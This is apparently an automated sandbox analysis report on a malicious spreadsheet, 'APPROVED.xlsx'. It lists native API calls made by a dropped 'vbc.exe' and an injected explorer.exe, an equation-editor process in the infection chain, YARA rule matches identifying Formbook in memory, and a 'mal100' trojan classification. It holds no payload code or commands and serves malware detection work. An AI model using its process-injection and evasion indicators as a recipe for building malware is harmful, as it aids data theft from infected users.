          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 8_2_004181B0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00418260 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_004182E0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_004182AC NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041838B NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00930078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00930060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0093010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00931148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00931930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00930C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00931D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0092FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A210D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A20060 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A20078 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A20048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A201D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A2010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A21148 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A21930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A20C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A21D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A1FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000981B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00098260 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000982E0 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00098390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000982AC NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009838B NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00375078
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003710EB
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00377108
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003761F0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003722A0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00370308
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00372740
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00375808
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00379858
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00371D59
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00372078
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00372088
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00379220
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00372290
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0037A2EA
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00379440
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0037F440
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00374490
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003714CF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003796A0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0037273C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00378E88
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00377FE8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004F2A68
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004F0048
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004F2640
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004F2C78
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004F2C2C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004F2CC7
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B8B1
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B963
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00408C4B
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00408C50
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B493
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B496
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041C539
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00402D89
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041CE85
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041BF12
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041C795
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0093E0C6
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0096D005
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0095905A
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00943040
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009BD06D
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009CD13F
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0093E2E9
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009E1238
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009E63BF
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009663DB
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0093F3CF
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00942305
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00947353
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0098A37B
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00975485
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00951489
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009C443E
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0097D47D
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009E35DA
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0095C5F0
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009C05E3
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0094351F
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00986540
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00944680
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0094E6C1
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0098A634
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009E2622
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009C579A
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0094C7BC
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009757C3
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009BF8C4
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009DF8EE
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0094C85C
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0096286D
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009E098E
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009429B2
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009569FE
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009C5955
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009C394B
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009F3A83
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009ECBA4
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0093FBD7
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009CDBDA
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009C6BCB
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00967B00
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009E2C9C
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009CAC5E
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009DFDDD
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00970D3B
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0094CD5B
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00972E2F
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0095EE4C
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009DCFB1
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009B2FDC
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009CBF14
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00950F3F
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0096DF7C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A2E2E9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AD1238
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AD63BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A2F3CF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A563DB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A32305
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A7A37B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A37353
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A2E0C6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A5D005
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AAD06D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A33040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A4905A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A34680
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A3E6C1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AD2622
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A7A634
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A3C7BC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AB579A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A657C3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A65485
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A41489
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AB443E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A6D47D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AB05E3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A4C5F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A3351F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A76540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AE3A83
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02ADCBA4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02ABDBDA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A2FBD7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A57B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02ACF8EE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AAF8C4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A5286D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A3C85C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A329B2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AD098E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A469FE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AB394B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AB5955
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A62E2F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A4EE4C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02ACCFB1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02AA2FDC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A40F3F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A5DF7C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02ACFDDD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A60D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A3CD5B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009B493
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009B496
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009C539
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009C795
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009B8B1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009B954
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00088C4B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00088C50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00082D89
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00082D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009CE85
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009BF12
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00082FB0
          Source: APPROVED.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02A2DF5C appears 121 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02A9F970 appears 84 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02A7373B appears 245 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02A73F92 appears 132 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02A2E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0093DF5C appears 129 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0098373B appears 248 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009AF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00983F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0093E2A8 appears 60 times
          Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@17/7@7/7
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$APPROVED.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCF21.tmpJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e...........................................2.........2.......2.....
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................2.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........`3........4.t...........0.......................&.................2.....
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
